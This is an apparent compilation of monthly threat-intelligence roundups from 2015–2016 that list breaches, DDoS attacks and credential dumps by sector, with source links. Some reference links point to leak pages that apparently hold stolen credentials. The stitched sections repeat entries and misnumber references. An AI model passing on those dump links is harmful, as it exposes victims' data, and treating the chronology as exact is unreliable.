- http://news.softpedia.com/news/anonymous-leaks-data-of-52-cincinnati-police-officers-500801.shtml
- http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/
- http://news.softpedia.com/news/anonymous-leaks-data-of-52-cincinnati-police-officers-500801.shtml
- http://tass.ru/en/politics/854615
- http://www.bloomberg.com/news/articles/2016-02-08/russian-hackers-moved-currency-rate-with-malware-group-ib-says
- http://arstechnica.com/security/2016/02/password-cracking-attacks-on-bitcoin-wallets-net-103000/
- http://www.databreaches.net/rubberstamps-net-incipio-notify-customers-of-breaches/
- https://hacked-emails.com/leak/siph0n-4489
- http://siph0n.net/exploits.php?id=4443
- https://hacked-emails.com/leak/pb-yRctTBhj
- http://motherboard.vice.com/read/hacker-claims-to-have-sold-27m-dating-site-passwords-mate1-com-hell-forum
Below are the key attacks that happened in January 2016, grouped by sector:
- Government and Defense
- Banking and Financial Services
- Ecommerce and Online Sectors
Government and Defense:
Anonymous starts its campaign against the Thai government and claims responsibility for shutting down 14 Thai police websites, in protest at the death sentences handed to two Myanmar migrant workers (Zaw Lin and Win Zaw Htun) convicted of murdering two British tourists (Hannah Witheridge and David Miller). (1) Sc0rp!n Att@ck3r from Muslim Cyber Army hacks Goa University (unigoa.ac.in) and dumps 10,380 records with hashed passwords. (2) In the name of #OpNigeria and #OpCorruption, the Nigerian branch of Anonymous takes down several government websites. (3) Hokkaido University reveals that the personal data of more than 110,000 students and graduates may have been leaked after unauthorized access to its computer systems by unknown parties. (4)
Operation #BoycottThailand, which aims to expose wrongdoing by the Thai police over the death sentences handed down to the two Myanmar migrant workers, continues: Blink Hacker Group, a collective affiliated with Anonymous, leaks 1 GB of data belonging to Thailand's Supreme Court. (5) Ukrainian authorities announce a review of the defences of government computer systems after detecting a cyber attack on Kiev's main airport launched from a server in Russia. (6) The State of Michigan confirms that it has suffered a cyber attack similar to the one that targeted Hurley Medical Center. (7)
A number of Irish government-related and public-sector websites are knocked offline by an apparent DDoS attack. (8) UK-based researcher and activist Thomas White releases 2.5 GB of data stolen in a recent hack of the computer systems of the Fraternal Order of Police (FOP), the biggest police union in the United States. White is not the author of the attack and says he received the data from an unknown source. (10)
Banking and Financial Services:
Belgian bank Crelan is the latest victim of fraudsters, losing over EUR 70 million (around $75.8 million). (11) A group of Turkish hackers dubbed WKPF defaces the official website of Ekonombank, Russia's Joint-Stock Commercial Bank for Reconstruction and Development. (12)
The University of Virginia admits to a data breach that has put the private data of employees at risk: attackers accessed a component of the HR system, exposing information belonging to approximately 1,400 Academic Division employees. (13) Hackers break into the servers of Bank Yerushalayim and access data on thousands of customers. (14) HSBC is hit by an apparent DDoS attack on its online banking system. (15)
Ecommerce and Online Services:
An unknown attacker hacks pagesjaunesdusenegal.com and dumps 9,500 usernames and hashed passwords. (16) A crew called Fr0mShell hacks over2craft.fr and dumps 5,868 accounts with clear-text passwords. (17)
Paul Vernon, founder of the cryptocurrency exchange Cryptsy, announces that the exchange has been hacked. The announcement comes more than a year after the hack was discovered because Cryptsy had, in the meantime, been trying to cover the losses, which amount to USD 6 million. (18)
References:
- http://www.scmagazine.com/anonymous-attacks-thai-police-websites/article/463188/
- http://opindiareborn.blogspot.co.uk/
- https://www.hackread.com/anonymous-targets-nigerian-government-websites/
- http://www.japantimes.co.jp/news/2016/01/14/national/personal-data-of-110000-may-have-leaked-from-hokkaido-university/#.VqPHH1OLR0t
- https://www.hackread.com/anonymous-exposes-1gb-data-of-thailands-supreme-court/
- http://uk.reuters.com/article/uk-ukraine-cybersecurity-malware-idUKKCN0UW0S7
- http://www.mlive.com/news/flint/index.ssf/2016/01/state_confirms_cyber_attack_si.html
- http://www.theregister.co.uk/2016/01/22/irish_gov_ddos/
- http://www.ibtimes.co.uk/anonymous-takes-down-tokyo-airport-website-protest-against-dolphin-culling-1539846
- http://www.net-security.org/secworld.php?id=19394
- http://www.net-security.org/secworld.php?id=19370
- https://www.hackread.com/turkish-hackers-deface-russian-bank-website/
- http://www.zdnet.com/article/university-of-virginia-data-breach-exposed-financial-data/
- http://hamodia.com/2016/01/24/75822/
- http://arstechnica.co.uk/security/2016/01/hsbc-online-banking-suffers-major-outage-blames-ddos-attack/
- https://hacked-emails.com/leak/pb-DN7LqMxk
- http://pastebin.com/FB97Yk72
- https://www.hackread.com/cryptsy-hacked-bitcoin-worth-usd-6-million-stolen/
Government, Defense and Allied Sectors:
China is blamed for a major cyber-attack on the computers of the Australian Bureau of Meteorology (bom.gov.au), which has compromised sensitive systems across the Federal Government. (1) NetherlandsMoDz hacks apgschool.com and dumps 1,087 records with usernames and hashed passwords. (2) A hacker called g0tchack hacks the website of the City of Providence and demands a ransom of 1 BTC (about US$358 at the time) to return the data. (3) Security researchers from FireEye unveil the details of APT16, a new APT group linked to mainland China that targets Taiwanese politicians and members of the media just weeks before the country's elections. (4)
The US Department of Homeland Security (DHS) and US Customs and Border Protection (CBP) report on incidents in which drug traffickers hacked unmanned aerial vehicles (UAVs, drones) in order to cross the US-Mexican border illegally and undetected. (5) Armenian hackers from the Monte Melkonian Cyber Army hack the official websites of Azerbaijan's Ministry of Labour and Social Protection and Ministry of Emergency Situations, and leak a trove of sensitive documents belonging to local citizens. (6) Palo Alto Networks unveils the details of a cyber-espionage campaign targeting Russian or Russian-speaking organizations. The campaign appears to be a continuation of an operation first uncovered by ESET, called Roaming Tiger; suspicion points to China. (7)
The Ukrainian government blames power outages in western Ukraine on "hacker attacks by Russian special services". According to the Security Service of Ukraine (SBU), malware has been found in the networks of some utilities, and the intrusions coincided with a "non-stop telephone flood at utility plants' technical support departments", according to local reports. (8) Egyptian hackers associated with the Anonymous Rabaa Team deface the website of Costa Rica's Ministry of the Environment, specifically two pages with details about the System of Conservation Areas and Isla del Coco (Cocos Island), the inspiration for Isla Nublar in the Jurassic Park movies. (9)
The official web portal of the University of Connecticut is compromised and used to spread malware to all visitors, disguised as a fake Adobe Flash Player update. (10) Researcher Chris Vickery uncovers a database exposed on the web (300 GB) containing personal information on 191 million American citizens registered to vote; the data appears to date back to 2000. The researchers point to NationBuilder, a service that sets up digital campaigns for political parties, as the likely source. (11)
Banking, Financial Services and Allied Sectors:
A crew called Comcastkids hacks agpestores.com and dumps 120,000 usernames and passwords. (12) Quincy Credit Union temporarily suspends its customers' ATM cards after multiple people report fraudulent charges; the credit union confirms it is investigating a possible hack. (13) The Association of Banks in Singapore (ABS) warns mobile users of new malware targeting banking services and hijacking sensitive data such as credit card details and one-time passwords (OTPs). The malware affects both Android and iOS devices. (14)
Ecommerce, Online Services and Allied Sectors:
@Smitt3nz AKA Rubber hacks igcd.net and dumps 1,452 usernames and hashed passwords. (15) ap3x h4x0r from the Anonsec collective hacks saifa.ir and dumps 11,792 records. (16) GrenXPaRTa hacks befriending.co.uk and dumps 7,325 usernames and hashed passwords. (17) In a letter to customers, UK web hosting firm Easily.co.uk reveals that it suffered a targeted attack which exposed an unspecified number of customer domain names. (18)
ProjectDump hacks bluebooktrader.com and dumps 6,187 usernames and hashed passwords. (19) Phantom Squad prepare their Christmas campaign and claim responsibility for a DDoS attack on Microsoft's Xbox Live service. (20) An unknown hacker hacks tunesoman.com and dumps 7,343 usernames and passwords. (21)
Wishing you all ‘secure’ and ‘hack-free’ 2016!
References:
- http://www.abc.net.au/news/2015-12-02/china-blamed-for-cyber-attack-on-bureau-of-meteorology/6993278
- http://pastebin.com/UAQakZ2N
- http://wpri.com/2015/12/13/providence-city-website-was-hacked/
- http://news.softpedia.com/news/chinese-hackers-target-taiwanese-politicians-just-before-elections-497978.shtml
- http://news.softpedia.com/news/drug-cartels-are-hacking-us-border-patrol-drones-498312.shtml
- https://www.hackread.com/armenians-hackers-hack-azerbaijani-ministry-servers/
- http://news.softpedia.com/news/russian-organizations-targeted-in-recent-cyber-espionage-campaigns-498017.shtml
- http://www.theregister.co.uk/2015/12/29/kiev_power_outages_blamed_on_russian_hackers/
- http://news.softpedia.com/news/anonymous-hacks-costa-rican-website-associated-with-jurrasic-park-island-498087.shtml
- http://news.softpedia.com/news/uconn-website-hijacked-and-used-to-spread-a-fake-flash-player-containing-malware-498186.shtml
- http://www.forbes.com/sites/thomasbrewster/2015/12/28/us-voter-database-leak/
- http://siph0n.net/exploits.php?id=4303
- http://boston.cbslocal.com/2015/12/27/quincy-credit-union-restricts-atm-transactions-after-customers-report-fraudulent-charges/
- http://www.zdnet.com/article/singapore-consumers-warned-of-malware-targeting-mobile-banking-services/
- http://siph0n.in/exploits.php?id=4266
- http://pastebin.com/ftXELSC5
- http://grenxparta.blogspot.co.id/2015/12/hacked-leak-and-dump-site.html
- http://www.infosecurity-magazine.com/news/uk-web-hoster-easily-hit-by/
- http://pastebin.com/Dmjb4SeJ
- http://arstechnica.com/gaming/2015/12/hacker-group-phantom-squad-takes-down-xbox-live-in-ddos-attack/
- http://pastebin.com/AkTHb46u
Defense, Government and Allied sectors:
China is blamed for a major cyber-attack on the computers of the Australian Bureau of Meteorology (bom.gov.au), which has compromised sensitive systems across the Federal Government. (1) NetherlandsMoDz hacks apgschool.com and dumps 1,087 records with usernames and hashed passwords. (2) The Danish Parliament website folketinget.dk is taken offline in a DDoS attack. (3)
Several Internet services in Boston are disrupted by a DDoS attack, described by officials as a "minor act of cyber vandalism". The outage affects city agencies and the police and fire departments. (4) The website of Japan's Health, Labor and Welfare Ministry is taken down by a DDoS attack; the Anonymous collective claims responsibility. (5)
Banking and Financial Services:
Reuters reveals that hackers belonging to the Armada Collective have staged cyber-attacks on three Greek banks and demanded a ransom in bitcoins to stop the disruption. (6) Group-IB reveals that over the last five years criminals in Russia have stolen 252 million roubles ($3.8 million) from five unnamed banks using a novel technique called a "reverse ATM attack". (7) A hacker called Hacker Buba breaks into Invest Bank and holds it to ransom, demanding $3 million and leaking confidential client data on Twitter every few hours. (8) In another episode of the cyber war between Armenian and Azerbaijani hackers, an Armenian group calling itself A.S.A.L.A. hacks the Mortgage Fund sub-domain (amf.cbar.az) of the Central Bank of Azerbaijan and leaks some customer data. (9)
E-Commerce and Online Services:
On November 30 and December 1, 2015, in two separate intervals, several of the Internet's DNS root name servers are the target of a massive DDoS attack. (10) @Smitt3nz AKA Rubber hacks igcd.net and dumps 1,452 usernames and hashed passwords. (11) ap3x h4x0r from the Anonsec collective hacks saifa.ir and dumps 11,792 records. (12) Researchers from Comodo identify a new phishing attack aimed specifically at businesses and consumers who use Alibaba.com. (13) ProjectDump hacks bluebooktrader.com and dumps 6,187 usernames and hashed passwords. (14)
References:
- http://www.abc.net.au/news/2015-12-02/china-blamed-for-cyber-attack-on-bureau-of-meteorology/6993278
- http://pastebin.com/UAQakZ2N
- http://www.scmagazine.com/ddos-attack-knocks-danish-parliament-website-offline/article/459253/
- http://www.bostonherald.com/news/local_coverage/2015/12/officials_call_city_hall_cyberattack_minor
- http://www.globalpost.com/article/6691762/2015/11/21/japan-probes-possible-cyber-attack-anonymous-health-ministry-website
- http://www.reuters.com/article/2015/11/30/greece-banks-idUSL8N13P5B420151130#8J9mWZxowdvvfWli.97
- http://www.forbes.com/sites/thomasbrewster/2015/11/23/visa-mastercard-atm-fraud-hackers-steal-millions-dollars/
- http://gulfnews.com/xpress/dubai/courts-crime/hacker-holds-uae-bank-to-ransom-demands-3m-1.1626394
- https://www.hackread.com/armenian-group-hacks-azerbaijan-central-bank/
- http://www.zdnet.com/article/singapore-consumers-warned-of-malware-targeting-mobile-banking-services/
- http://siph0n.in/exploits.php?id=4266
- http://pastebin.com/ftXELSC5
- https://blog.comodo.com/comodo-news/alibaba-phishing-attack/
- http://pastebin.com/Dmjb4SeJ
Government and Defence:
The Kennebec County phone system is hacked, with more than 2,100 calls placed over a single weekend. (1) Two Brazilian hackers deface two government-owned domains belonging to the Brazilian Institute of Research and Development in Astronomy, Geophysics and Meteorology of Time and Frequency (intranet.on.br and euler.on.br). (2) Ha Tae-Kyung, a Seoul lawmaker, cites intelligence reports stating that North Korea is suspected of having launched a cyber-attack last year on the South Korean capital's subway system, which carries millions of commuters every day. (3) Researchers from Check Point disclose the details of a campaign targeting the Israeli public sector, using the MWI (Microsoft Word Intruder) exploit kit to deliver a modified version of the Zeus malware. (4)
The Belgian branch of the Anonymous collective takes down the official websites of Belgian Prime Minister Charles Michel, the Brussels parliament and the Federal Public Service Home Affairs. (5) A hacker going by the online handle Kuroi SH defaces several domains of the US-based Uniformed Services University and leaks login credentials from 2014 online. (6) A hacker dubbed Implosion hacks the Rutgers University Pharmaceutical Industry Program and dumps 1,057 usernames and hashed passwords. (7) South Korea's intelligence agency reports that North Korean hackers accessed servers belonging to the Blue House, the executive office of South Korea, and stole data from computers belonging to members of the nation's legislature. (8) Trend Micro reveals that the hackers behind Operation Pawn Storm targeted the international team investigating the MH17 crash from several angles. (9) KelvinSecTeam hacks a subdomain of the Venezuelan Education Ministry and dumps 2,788 usernames and clear-text passwords. (10)
Banking and Financial Services:
Online stock brokerage Scottrade reveals a breach that exposed the personal information of 4.6 million customers. Scottrade officials say in an online advisory that the breach happened in late 2013 or early 2014 and exposed Social Security numbers, email addresses and "other sensitive information". (11) A Russian man who calls himself "Alister Maclin" has been disrupting the Bitcoin network for over a week by creating duplicate transactions, annoying users. (12)
The New York Times reveals that, months before its technology became the centrepiece of Samsung's new mobile payment system, LoopPay, a small Massachusetts subsidiary of the South Korean electronics giant, was the target of a sophisticated attack by a group of government-affiliated Chinese hackers. (13) E-Trade notifies about 31,000 customers that some of their personal information may have been accessed during a cyberattack in late 2013. (14) Optimal Payments Plc says it is investigating allegations that personal data belonging to some of its customers may have been compromised and made available on the dark web; according to the allegations, the breaches occurred at two of its units in 2012 or earlier. (15)
Ecommerce and Online Services:
Hackers break into a server and make off with names, driver's license numbers and other personal information belonging to more than 15 million US consumers who applied for cellular service from T-Mobile. The breach results from an attack on a database maintained by the credit-reporting service Experian, which was contracted to process credit applications for T-Mobile customers, and affects people who applied for T-Mobile service between September 1, 2013 and September 16, 2015. (16) An anonymous hacker hacks three Thai e-commerce sites in a single operation and dumps approximately 5,900 usernames and hashed passwords from each of them. (17)
An unknown hacker hacks aussiefarmers.com.au and dumps more than 5,500 personal records. (18) A hacker calling himself NetherlandsMoDz claims to have hacked asialawhouse.com and dumps nearly 7,000 usernames and clear-text passwords. (19) A hacker dubbed mr.nsaany (@mr.nsaany) hacks forums.phpfreaks.com and leaks the entire database (allegedly 173,000 users). (20) NetPirates hack bharatlaws.com and dump more than 10,000 usernames and clear-text passwords. (21) A crew of hackers called Comcastkids hacks shopatsullivan.com and dumps more than 10,000 accounts. (22)
References:
- https://www.centralmaine.com/2015/10/06/kennebec-countys-phone-system-hacked-over-weekend/
- https://www.hackread.com/brazilian-hackers-question-corruption-nsa-snooping/
- http://www.securityweek.com/north-korea-suspected-hacking-seoul-subway-operator-mp
- http://blog.checkpoint.com/2015/10/09/israeli-public-sector-targeted-by-zeus-trojan-hidden-in-a-word-document/
- https://www.hackread.com/anonymous-targetes-belgian-govt-websites/
- https://www.hackread.com/uniformed-services-university-domain-hacked/
- http://blog.checkpoint.com/2015/10/09/israeli-public-sector-targeted-by-zeus-trojan-hidden-in-a-word-document/
- http://www.bbc.co.uk/news/uk-34717572
- http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/
- http://pastebin.com/xh93uwpN
- http://arstechnica.com/security/2015/10/scottrade-breach-exposes-sensitive-data-for-4-6-million-customers/
- http://motherboard.vice.com/read/i-broke-bitcoin
- http://www.nytimes.com/2015/10/08/technology/chinese-hackers-breached-looppay-a-contributor-to-samsung-pay.html?_r=0
- https://www.washingtonpost.com/news/the-switch/wp/2015/10/09/e-trade-notifies-31000-customers-that-their-contact-info-may-have-been-breached-in-2013-hack/
- http://uk.reuters.com/article/2015/10/29/us-optimal-payments-cybercrime-idUKKCN0SN0OR20151029
- http://arstechnica.com/security/2015/10/highly-personal-data-for-15-million-t-mobile-applicants-stolen-by-hackers/
- http://siph0n.net/exploits.php?id=4150 , http://siph0n.net/exploits.php?id=4151 , http://siph0n.net/exploits.php?id=4152
- http://siph0n.net/exploits.php?id=4143
- http://pastebin.com/nAzu3Xkr
- http://www.databreaches.net/php-freaks-forum-database-hacked
- http://siph0n.net/exploits.php?id=4096
- http://siph0n.net/exploits.php?id=4110
September TI Report:
September saw increased activity in the first half of the month and a downward trend in the second half. SecurBay's Threat Intelligence Report compiles the month's cyberattacks worldwide, sector by sector.
Government, Defense and Education:
Kelvinsecurity AKA KelvinSecTeam hacks the website of Mexico's Ministry of Public Education (Secretaría de Educación Pública, sepdf.gob.mx) and dumps 106 records with hashed passwords. (1) A group of hackers going by the online handles RootDevilz, Jonturk75 and Bozkurt97 deface the official website of Unicef India (unicef.in) and post a message against China, the US, the UN and the EU. (2) JM511 dumps some data from the University of California, Los Angeles (UCLA) after allegedly warning the university twice. The attacker also warns other universities of possible vulnerabilities, including Western Governors University in Utah, the University of Minnesota, DePaul University and Northern Illinois University. (3) In the name of OpTaiwan, the hacktivist collective Anonymous shuts down several Taiwanese government websites. (4)
Lizard Squad takes down the official website of the UK's National Crime Agency (nationalcrimeagency.gov.uk). (5) Hackers claiming to be part of Islamic State deface the Wayne County Board of Education website (boe.wayn.k12.wv.us). (6) The website of Greater Manchester Police in the UK (gmp.police.uk) is hit by two DDoS attacks; a Twitter account with the handle @n0w1337 claims responsibility. (7)
Hackers infiltrate the computer system of the Pentagon's food court, compromising the bank data of an unknown number of employees. (8) FireEye researchers discover a campaign, attributed to attackers from North Korea, that exploits a zero-day vulnerability (CVE-2015-6585) in Hangul Word Processor, which is widely used within the South Korean government. The backdoor it delivers is called Hangman. (9)
Banking and Finance:
Hawaii First Federal Credit Union notifies an undisclosed number of customers that an unauthorized individual may have gained access to an employee's email account and could have accessed personal information. (10) The CSIS team reports a new variant of the Carbanak trojan using a new communications protocol. (11)
YapStone (VacationRentPayments) notifies some property managers and other users of its service for receiving vacation rental payments that personal information in their account applications was compromised by unauthorized persons between July 15, 2014 and August 5, 2015. (12)
A group of hackers calling itself "Hack for Trump" claims to have hacked the website of Fidelity Group and threatens to make the stolen data public unless Fidelity pays $30,000; the hackers say they plan to use the funds "to help Donald Trump get elected to the White House". (13) In the name of #OpBankDump, Ghost Italy, a local cell of the Anonymous collective, hacks Banca Intesa and Unipol Banca, two of the most important Italian banks, and leaks several databases, mainly related to external contractors. (14)
Online Services and Ecommerce:
Patreon, the website that lets people make regular donations to a website, an artist or a project, announces that it has suffered a security breach. The site says some registered names, email addresses and mailing addresses were accessed after someone reached a "debug version of our website" that was at the time publicly accessible. The attackers go on to leak gigabytes of data. (15) 0x0D1337 hacks dutchwow.com (a private World of Warcraft server) and dumps 3,917 records containing usernames and hashed passwords. (16)
Frank J. Martin Company notifies an undisclosed number of individuals who made purchases on the Padlocks4Less website that their personal information, including payment card data, may have been accessed without authorization. (17) Red Hat reveals an intrusion on the sites of both the Ceph community project (ceph.com) and Inktank (download.inktank.com) that resulted in signed code being accessed. (18)
The names, addresses and credit card information of approximately 93,000 customers of Web.com, a popular US-based provider of Internet services to small businesses, are compromised in a breach of one of the company's computer systems. (19)
References:
- http://siph0n.net/exploits.php?id=4001
- https://www.hackread.com/unicef-india-website-turkish-hackers/
- http://www.databreaches.net/more-american-universities-hacked-by-jm511/
- https://www.hackread.com/anonymous-brings-down-taiwan-govt-websites/
- http://arstechnica.com/security/2015/09/lizard-squad-launches-ddos-against-uk-law-enforcement-agency/
- http://www.statejournal.com/story/29943796/hacker-claiming-to-be-part-of-islamic-state-hacks-wayne-county-wv-board-of-education-website-redirects-visitors-to-site-promoting-terrorism
- http://www.infosecurity-magazine.com/news/manchester-uks-website-knocked/
- http://www.washingtonexaminer.com/pentagon-food-court-computers-hacked-exposing-employees-bank-information/article/2571606
- http://www.theregister.co.uk/2015/09/10/north_korea_exploits_zero_day_in_seouls_favourite_word_doc/
- http://www.scmagazine.com/hawaii-credit-union-notifies-customers-of-employee-email-breach/article/436785/
- http://news.softpedia.com/news/carbanak-banking-trojan-returns-with-a-new-series-of-attacks-491015.shtml
- http://www.databreaches.net/vacationrentpayment-notifies-customers-whose-account-application-information-was-hacked/
- http://www.compasscayman.com/caycompass/2015/09/18/Fidelity-Bank-hacked-and-blackmailed/
- http://www.repubblica.it/tecnologia/2015/09/28/news/anonymous_opbankdump_unipol_intesa-123815381/?ref=HRER2-1
- http://arstechnica.com/security/2015/10/patreon-some-user-names-e-mail-and-mailing-addresses-stolen/
- http://siph0n.net/exploits.php?id=4088
- http://www.scmagazine.com/padlocks4less-website-possibly-compromised-payment-cards-at-risk/article/441140/
- http://www.theregister.co.uk/2015/09/18/intrusion_at_cephcom_makes_for_red_faces_at_red_hat/
- http://www.net-security.org/secworld.php?id=18783
Government and Allied Sectors:
In the name of OpTaiwan, the hacktivist collective Anonymous shuts down several Taiwanese government websites. (1) A disgruntled former student is thought to be responsible for hacking Bodmin College's website and defacing it with a series of obscenities. (2) MuhmadEmad, an anti-ISIS Kurdish hacker, defaces the sites of the Etowah County Sheriff's Office and the Hardin Center (etowahcountysheriff.com and culturalarts.com), posting a message against Islamic State. The sites are hosted on Network Solutions, which publishes a statement about the attack. (3) The website of the office of Sri Lankan prime minister Ranil Wickremesinghe is hacked by a pro-Syria hacktivist dubbed Dr.MwNs. (4)
US officials tell NBC News that Russia launched a "sophisticated cyberattack" against the Pentagon's Joint Staff unclassified email system, which has been shut down and taken offline for nearly two weeks. According to the officials, the intrusion occurred around July 25 and affected some 4,000 military and civilian personnel who work for the Joint Chiefs of Staff. (5) A hacker breaks into a City of Henderson web server and has access to data for nine days before being detected; the city states that no personal or sensitive information was compromised. (6) China's cyber spies have accessed the private emails of "many" top Obama administration officials, according to a senior US intelligence official and a top-secret document obtained by NBC News, and have been doing so since at least April 2010. (7) In the name of #OpCustoms, a group of hackers takes down the website of the Philippine Bureau of Customs (customs.gov.ph). (8) Kelvinsecurity AKA KelvinSecTeam hacks the website of the Venezuelan Institute for Scientific Research (Instituto Venezolano de Investigaciones Científicas, ivic.gob.ve) and dumps 60 usernames and hashed passwords. (9)
Banking and Allied Sectors:
The RBS banking group reveals that it suffered a cyber attack on its online services that left customers struggling to log on for nearly an hour. (10) The Australian Securities and Investments Commission (ASIC) reveals that an unnamed Russian hacker used compromised retail accounts held with E*Trade, CommSec and the Australian Investment Exchange to illegally manipulate more than a dozen penny stocks, to the tune of A$77,429 (nearly US$57,000). (11) Several banks across the UAE replace credit cards following a possible security breach involving online hackers. (12)
Online and Ecommerce Services:
OneBookShelf, the operator of websites that sell games and comics as PDFs and print-on-demand publications, notifies customers that it suffered a hacker attack that obtained some credit card information. (13)
Millions of people visiting weather.com, drudgereport.com, wunderground.com and other popular websites are exposed to a new malvertising campaign, initially targeting AdSpirit.de and then moving to another advertiser (AOL).
NetPirates AKA @TheNetship hack gohens.net, an online forum, and dump 8,300+ usernames and hashed passwords. (14)
Website domain name registrar Hover emails users warning of possible "unauthorised access" to one of its systems, telling them that they will not be able to log into the service until they reset their passwords. (15)
American Airlines Group Inc., the world's biggest carrier, announces that an investigation is ongoing to verify whether the same attackers who targeted Sabre had entered its computers. (16)
References:
- https://www.hackread.com/anonymous-brings-down-taiwan-govt-websites/
- http://www.cornishguardian.co.uk/Bodmin-College-website-hacked-obscenities-WARNING/story-27514759-detail/story.html
- https://www.hackread.com/anti-isis-kurdish-hacker-sheriff-site/ and http://www.databreaches.net/network-solutions-customer-sites-defaced/
- https://www.hackread.com/sri-lankan-prime-ministers-office-website-hacked/
- http://www.cnbc.com/2015/08/06/russia-hacks-pentagon-computers-nbc-citing-sources.html
- http://www.reviewjournal.com/politics/government/hacker-breaks-henderson-computer-server
- http://www.nbcnews.com/news/us-news/china-read-emails-top-us-officials-n406046
- http://philippineitnewsandservices.blogspot.co.uk/2015/08/philippines-bureau-of-customs-dozed-by.html
- http://siph0n.net/exploits.php?id=3999
- http://www.theguardian.com/business/2015/jul/31/rbs-and-natwest-customers-complain-of-online-problems
- http://www.scmagazine.com/aussies-finger-russian-in-stock-hack/article/430752/
- http://www.emirates247.com/business/technology/fraud-alert-uae-banks-replace-credit-cards-after-security-scare-2015-08-05-1.599203
- http://icv2.com/articles/news/view/32291/credit-card-breach-onebookshelf
- http://siph0n.net/exploits.php?id=3995
- https://grahamcluley.com/2015/08/security-alert-hover-leads-password-reset/
- http://www.bloomberg.com/news/articles/2015-08-07/american-airlines-sabre-said-to-be-hit-in-hacks-backed-by-china
Government, Defence and Allied Sectors:
Armenian hackers from the Monte Melkonian Cyber Army hack into the official website of Azerbaijani customs (and other Azerbaijani sites), stealing highly confidential personal information of 5,650 Azerbaijani citizens. (1)
In the name of #OpBillC51, Anonymous hacks the Québec Parental Insurance Plan Centre (http://www.rqap.gouv.qc.ca), the Ministry of Labor, Employment and Social Solidarity (http://www.mess.gouv.qc.ca) and the National Review Commission website on employment insurance (http://www.cneae.gouv.qc.ca). (2)
Members of the Anonymous collective claim to have crashed the Royal Canadian Mounted Police (RCMP) website in retaliation for the killing of a member in a shooting involving the Canadian police. (3)
More than 13,000 email addresses have been stolen from Edinburgh city council's database following a "malicious cyber attack". (4)
Banking, Financial Services and Allied Sectors:
Hacker collective Rex Mundi claims to have stolen 24,000 financial records from Belgian loan company AFC Kredieten, and threatens to publish every loan applicant record in its possession if the company does not pay a ransom. As proof that it has successfully hacked the company, Rex Mundi publishes some personal accounts and leaves a banner notification on the AFC Kredieten website. (5)
New Jersey-based Insurance Services Office (ISO) notifies an undisclosed number of consumers of unauthorized access to its database. (6)
Cloud mining service cloudminr.io is hacked. The attacker offers to sell the entire database (about 80,000 users) for 1 BTC (approx. 276 USD). (7)
Online, E-commerce and Other Services:
Hacking Team, the Italian company behind the infamous surveillance software, is hacked. The attacker, allegedly the same author behind the attack on Gamma International (another surveillance software vendor), dumps approximately 400GB of data. (8)
Primedice, an online gaming/gambling site, loses $1 million in bitcoin to an attacker who exploited its random number generation (RNG) system. (9)
A hacker called savaka hacks the Plex server hosting the forums and the blog. The attacker asks for a ransom of 9.5 BTC to avoid the leak of the data. (10)
Attackers believed to have originated in China hack into the email of Bonnier Publications CEO Dave Freygang and steal $1.5 million with a fraudulent electronic transfer. (11)
Waseda University admits that it took about half a year to discover that personal data on roughly 3,300 officials and students had been leaked from an infected machine. (12)
Ashley Madison, an online dating website that specifically targets people looking to have an affair, is hacked by a group that calls itself Impact Team. The authors of the attack threaten to release the entire database of 37 million users. (13)
Finally, in the Hacking Team hack, the attackers claim 400GB in dumped data; the firm, which made its name by helping governments spy on their citizens, was left exposed. (14)
References:
- https://www.hackread.com/armenian-azerbaijani-cyberwar/
- https://www.hackread.com/anonymous-breaches-canadian-government-servers/
- https://www.hackread.com/anonymous-targets-canadian-police-rcmps-website/
- http://www.bbc.co.uk/news/uk-scotland-edinburgh-east-fife-33425853
- http://www.theregister.co.uk/2015/07/17/hacker_group_claims_theft_of_24000_belgian_loan_applicants_data/
- http://www.databreaches.net/insurance-services-office-database-breached-insurance-data-accessed/
- https://www.cryptocoinsnews.com/cloudminr-io-hacked-user-database-put-up-for-sale/
- http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html
- https://www.hackread.com/gambling-site-hacked-bitcoin-stolen/
- http://lifehacker.com/plex-hacked-change-your-password-now-1715355825
- http://www.nytimes.com/2015/06/17/sports/baseball/st-louis-cardinals-hack-astros-fbi.html
- http://mainichi.jp/english/english/newsselect/news/20150623p2g00m0dm002000c.html
- http://arstechnica.com/security/2015/07/ashley-madison-an-dating-website-for-cheaters-gets-hacked/
- http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html
Courtesy: http://www.hackmageddon.com/2015/07/20/1-15-july-2015-cyber-attacks-timeline/
Government, Defense and Allied Sectors:
The analysis of the December 2014 attack reveals that more than 14 million records were exposed in two different intrusions by suspected Chinese hackers. The chief of the Department of Personnel, which manages these records, quit office this month. This is considered an epic failure to protect key data from external hackers. (1) (2)
The official website of Platt County, Illinois, US, the election office and the sheriff's website were hacked by a pro-Palestinian hacker group. (3)
BAE Systems' Information Systems Department indicated there might have been a breach of its extranet, and the hacked files might contain some sensitive personnel information. (4)
An attacker who hacked Unicor.gov, the Federal Prison Industries site, has dumped 23,000 government employee records on a dark web site. (5)
Researchers from Palo Alto Networks reveal the details of a targeted campaign dubbed "Operation Lotus Blossom", carried out via more than 50 attacks against government and military organizations across Southeast Asia over the last three years. (6)
More than a dozen Canadian government departments are taken down by a DDoS attack. The Anonymous collective claims responsibility for the attack, in protest against the controversial C-51 bill. (7)
Recorded Future, a CIA-backed startup, discovers login credentials and passwords for 47 US government agencies littered across the Internet, leaving federal agencies potentially at risk of cyberattack. (8)
Banking, Insurance and Allied Sectors:
Cloud mining hash power online marketplace Scrypt.CC is hacked and a large, undisclosed amount of Bitcoin and hashing power is stolen (9).
E-Commerce, Education and other Services:
Colorado-based AeroGrow International, Inc. is notifying an undisclosed number of individuals who shopped on its website, AeroGarden.com, that malware was likely used to infiltrate AeroGrow's online servers, and that payment card data may have been compromised. (10)
Retail giant Eataly's NYC marketplace was compromised, and credit card data and payment details were stolen over a period of 3-4 months. (11)
Fred's Inc., a discount general merchandise and pharmacy chain that operates 650 stores in more than a dozen states, disclosed today that it is investigating a potential credit card breach. (12)
A hacker called EXCiDiUM claims to have hacked NC State University and dumps 1,338 usernames with clear text passwords. (13)
A hacker called @Kyfxsec claims to have hacked SPOTIFYMUSIC.SE (a Spotify users' forum) and dumps 4,432 usernames and passwords. (14)
A hacker dubbed str0ke AKA @str0ke_ claims to have hacked Wounds International (woundsinternational.com) and dumps 12,999 unique emails and passwords, plus 4 administrator credentials. (15)
